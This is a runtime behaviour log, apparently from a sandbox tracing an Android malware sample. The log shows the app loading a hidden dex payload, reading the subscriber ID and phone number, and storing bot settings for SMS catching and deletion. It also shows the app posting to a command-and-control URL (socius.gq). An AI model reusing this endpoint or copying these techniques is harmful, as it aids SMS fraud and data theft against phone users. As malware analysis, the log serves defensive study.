D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.qfviemzyiz.gpwlytpv-1/base.apk]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/cache]
D/S4URC   ( 3796): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/cache]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/cache]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [dalvik.system.DexClassLoader] [Constructor] [DexPath][String] [:/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar] [NDKPath][String] [null]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [dalvik.system.BaseDexClassLoader] [Constructor] [DexPath][String] [:/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar] [NDKPath][String] [null]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [canWrite] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [getName] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [getName] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.dex]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.dex]
D/S4URC   ( 3796): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.dex]
D/S4URC   ( 3796): [SDK] [dalvik.system.DexFile] [openDexFile] [DexPath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.jar]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/app_qhbdueby/gmxpl.dex]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/lib]
D/S4URC   ( 3796): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.qfviemzyiz.gpwlytpv/com.qfviemzyiz.gpwlytpv.ywhtfa}]
D/S4URC   ( 3796): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 3796): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_READABLE]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_READABLE] [Method][contains] [Check][first] [Return][false]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putBoolean] [Key][first] [Value][false]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][sid] [Value][1]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][version] [Value][2]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][server] [Value][http://socius.gq/indo20.php]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putInt] [Key][startPeriod] [Value][2]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putInt] [Key][period] [Value][18000]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putLong] [Key][timeNextConnection] [Value][1530088500421]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][subPref] [Value][]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][botId] [Value][]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][deleteSms] [Value][[]]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][catchSms] [Value][[]]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs]
D/S4URC   ( 3796): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][commit]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper] [startService] [Intent] Intent { cmp=com.qfviemzyiz.gpwlytpv/.arkwly (has extras) } [ExtraInfo][key:value][key:alarm][android.intent.extra.ALARM_COUNT:1]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3796): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3796): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3796): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://socius.gq/indo20.php]
D/S4URC   ( 3796): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://socius.gq/indo20.php]
D/S4URC   ( 3796): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putBoolean] [Key][first] [Value][false]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][sid] [Value][1]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][version] [Value][2]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][server] [Value][http://socius.gq/indo20.php]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putInt] [Key][startPeriod] [Value][2]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putInt] [Key][period] [Value][18000]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putLong] [Key][timeNextConnection] [Value][1530106505212]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][subPref] [Value][]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][botId] [Value][]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][deleteSms] [Value][[]]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][putString] [Key][catchSms] [Value][[]]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml] [DesFile][/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml] [NEW_PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml] [RETURN][int] [19]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml] [MODE][int] [0664]
D/S4URC   ( 3796): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml]
D/S4URC   ( 3796): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/com.qfviemzyiz.gpwlytpv/shared_prefs/save.xml.bak]
D/S4URC   ( 3796): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][save.xml] [MODE][MODE_WORLD_WRITEABLE] [Method][commit]
